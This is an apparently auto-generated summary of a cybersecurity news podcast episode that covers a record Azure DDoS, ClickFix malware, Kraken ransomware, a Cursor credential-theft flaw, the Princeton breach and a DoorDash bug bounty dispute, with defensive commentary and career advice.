Daily Cyber Threat Brief – Episode 1008
Date: November 18, 2025
Host: Dr. Gerald Auger, Simply Cyber
Main Theme:
A lively, insight-driven walk through the most critical cybersecurity news headlines shaping the threat landscape today. Dr. Auger delivers expert actionable commentary for practitioners, from technical analysts to GRC pros, blending community energy with practical advice for career growth.
Episode Overview
This episode, Dr. Gerald Auger tackles some of the largest active DDoS attacks, government site defacements, evolving malware campaigns, ransomware tactics, and the practical business impacts of breaches—all while emphasizing the ongoing cat-and-mouse dynamic between attackers and defenders, the value of real-world tabletop exercises, and practical takeaways for cybersecurity teams and leaders. The show's tone is energetic, supportive, and packed with accessible, career-friendly explanations.
Key Segments & Insights
1. Azure Hit by 500,000-IP Mirai Botnet DDoS
[12:36 - 17:47]
- Story: Microsoft Azure faced a 15.72 terabits per second DDoS from the Asiru (Mirai-variant) botnet, comprising over 500,000 IPs. The attack peaked at 3.64 billion packets/sec; a prior Cloudflare record was topped with a 22.2 Tbps hit from the same botnet.
- Dr. Auger’s Insight:
- Names and origins matter – Mirai (pronounced "me-rye") is a foundational botnet, its history well-known in the industry.
- Quote: “Whoever's sitting across from you absolutely knows what Mirai is.” (13:00)
- Attack scale matters: 15,000 IPs? Meh. 500,000+ is nightmare fuel.
- Modern context: Such attacks, while disruptive, are often quickly mitigated. Not all DDoS is infrastructure-killing – 40 seconds of downtime is survivable for most, but underscores the importance of robust business continuity plans.
- Business Takeaway: If Azure is critical to your ops, have contingency plans. "We can sustain a 40-second downtime..." (16:16)
2. Government Website Defacement – Kenya & Somalia
[17:47 - 22:13]
- Story: Kenyan gov’t sites were defaced with hate messages by a group called “PCP at Kenya.” Somalia also suffered a cyber incident impacting its e-visa system, with potential exposure for 35,000 travelers.
- Key Points:
- Defacements are less about operational impact, more about optics and psychological/socio-political impact.
- Quote: “This is a, like...burr under the saddle. It's annoying. It's, it's, it's offensive. But, you know, they could just go in and fix the website...” (18:41)
- Dr. Auger’s actionable advice: Use these low-impact but high-visibility attacks as tabletop scenarios – can your org quickly restore defaced public-facing assets? Do you know how and where your backups are?
3. Evolution Malware Campaign: “Eval” Delivers Amatera Stealer and RAT
[22:13 - 27:49]
- Story: A sophisticated campaign harnesses social engineering (“Click Fix”)—tricking users via fake captchas to launch PowerShell scripts downloading info-stealing malware.
- Auger’s Analysis:
- Focus not just on the tools (stealers, RATs), but on initial infection vectors: "It's the infection you got to worry about."
- Calls for vivid end user security training, making infosec personal and visual.
- Memorable Moment: Praise for relatable infographics, paired with a promise: “I'm gonna make a Click Fix end user video...and you guys could steal it.” (23:54)
- Practical tip: Gamify/reporting phishing in small/mid-size orgs ("a ticket for every true positive, draw for a prize at month-end").
4. New Ransomware & Defender Evasion Tactics – Kraken
[27:49 - 33:49]
- Story: Cisco Talos attributes novel behaviors to the Kraken ransomware—targeting Windows, Linux, ESXi; benchmarking each victim to optimize encryption speed vs. detection; leveraging Cloudflare for persistence and SSHFS for exfil.
- Key Quotes:
- “In the world of cybersecurity, we have jobs and we get paid decently because of threat actors. If threat actors didn’t exist, probably two thirds of us wouldn’t have jobs.” (30:30)
- “This is an evolution...cat and mouse game of the ransomware space.” (33:10)
- Actionable Advice:
- Blue Teams: Test your defensive stack with current ransomware variants—especially as threat actors adapt to defensive triggers.
- Note: Cloudflare’s own outages gave rise to jokes about attacker infra reliability!
5. AI Development Environment (“Cursor”) Bug Enables Credential Theft
[38:37 - 45:14]
- Story: Gnostic researchers expose how the AI-powered dev tool Cursor can be used to hijack internal browsers and steal developer credentials via unvalidated MCP servers.
- Dr. Auger’s Take:
- AI-generated coding tools (“Vibe coding”) increase surface areas for attack when security isn’t integral.
- “These platforms that can vibe code...are littered with OWASP top 10 vulnerabilities because it’s a software engineer, not a security professional.” (39:15)
- Recommends extreme diligence vetting all external integrations/extensions.
- Practical GRC Point: This hazard is comparable to poisoned NPM/PyPi/Github libraries—developer workflow supply chain risks.
6. Overconfidence vs. Cyber Readiness
[45:14 - 50:00]
- Story: Immersive’s report finds cyber teams are “overconfident but underprepared”—22% average accuracy in tabletop exercises, slow response to simulated breaches, and readiness plateauing since 2023.
- Auger’s Emotional/Practical Guidance:
- Tabletop exercises must challenge all team members; avoid “let Kevin handle it” syndrome.
- Quote: “Overconfidence is a killer. Oh hey, what happens if we get hit with ransomware? Oh, we’ll just restore from backups, no big deal.” (46:04)
- Remove ego and passion—objectively expose and fix both knowledge and process gaps.
- Special Note for Newcomers: “If you are younger or you’re only a couple years in...when you say 'oh, ransomware,' the person who’s been there 30 years...might say, 'we’d just restore from backups'—learn to let that slide off you, be objective.”
7. Princeton Database Breached
[50:00 - 53:23]
- Story: Attacker accessed a large database of alumni, faculty, and donor info (not including SSN or student records) for under 24 hours.
- Analysis:
- Ivy League donors = high-value targets (“straight cash, homie”).
- Princeton must deal with donor fallout and crisis comms, even if SSNs weren’t exposed.
- “This is less about Princeton University and more about straight cash, homie...” (50:33)
8. DoorDash Email Spoofing Flaw: Bug Bounty Controversy
[53:23 - 58:44]
- Story: Security researcher found critical flaw allowing anyone to send branded DoorDash emails (for 15+ months); DoorDash only fixed it after public pressure, then accused the researcher of extortion and banned him from bug bounty.
- Dr. Auger’s Take:
- Responsible disclosure should be praised, not punished.
- Quote: “If you run a bug bounty program, you have to pay your security researchers. It’s such an ugly ass look to not.” (56:55)
- Organizational lesson: Don’t antagonize your hacker community—they’re invaluable allies.
- “I can’t stand businesses that spend a dime to save a nickel...” (57:35)
9. CISA Hiring Spree to Rebuild Cyber Workforce
[58:44 - 59:30]
- Story: CISA plans to urgently hire after a ~40% vacancy in key roles, focusing on state and regional advisors, using more flexible work and academic pipelines.
- Community Impact:
- Great news for job seekers—possibly hundreds of openings.
- Contextual irony: agencies cut then rehire, but pragmatic for cybersecurity, where threats can’t outpace defenders for long.
Notable Quotes & Memorable Moments
-
Dr. Auger on the scale of DDoS attacks:
- “I don’t get out of bed for less than a hundred thousand IPs. Like, what are you doing?” (14:43)
-
On end user awareness and culture:
- “I’m gonna make a Click Fix end user video...you could steal it. I’m gonna literally make it accessible so it can be stolen. And you could slap your own company logo in the corner...” (24:41)
-
Crowdsourcing infosec wins:
- “Absolute bosses up in here at Team SC. Just sharing the wins, crushing, and really just setting the tone.” (29:12)
-
Personal touch:
- “A lot of love in chat today. It feels good. It’s like a digital hug.” (35:00)
-
Ransomware defense reality check:
- “When we come up with defenses, threat actors adjust and pivot and move around...it’s a cat and mouse game.” (30:30)
Timestamps – Key Segments
- Azure Mirai Botnet DDoS: 12:36–17:47
- Kenya/Somalia Gov Website Defacement: 17:47–22:13
- Eval Malware & Click Fix: 22:13–27:49
- Kraken Ransomware Evolution: 27:49–33:49
- AI Coding Tool (Cursor) Vulnerability: 38:37–45:14
- Cyber Team Overconfidence/Readiness: 45:14–50:00
- Princeton Alumni/Donor Breach: 50:00–53:23
- DoorDash Email Spoof Flaw/Bug Bounty drama: 53:23–58:44
- CISA Hiring Spree: 58:44–59:30
Takeaways & Action Points
- Stay crimeware-aware: The scale and speed of DDoS attacks keep rising; understand your “critical infrastructure” dependencies and incident plans.
- Make end user training actionable and relatable: Use real screenshots, gamification, and encourage direct reporting of phishing/“Click Fix” scams.
- Emphasize tabletop exercises: Remove hierarchy and ego; objectively walk through real scenarios, ensuring backups and processes are actually understood at the technical level.
- Monitor third-party supply chain risk if you use AI dev tools or imports.
- Bug bounty programs are most effective with transparent, fair, and supportive relationships with researchers.
- Job seekers: Eyes open for new public sector opportunities—CISA’s hiring spree is great news.
Dr. Jerry’s final words:
Public accountability: “I’m going to be making an end user awareness training video that you can steal...I will literally make it so you can steal it and make it for your business.” (1:00:42)
For more insights and community support, catch the Daily Cyber Threat Brief live on weekday mornings at simplycyber.io/streams.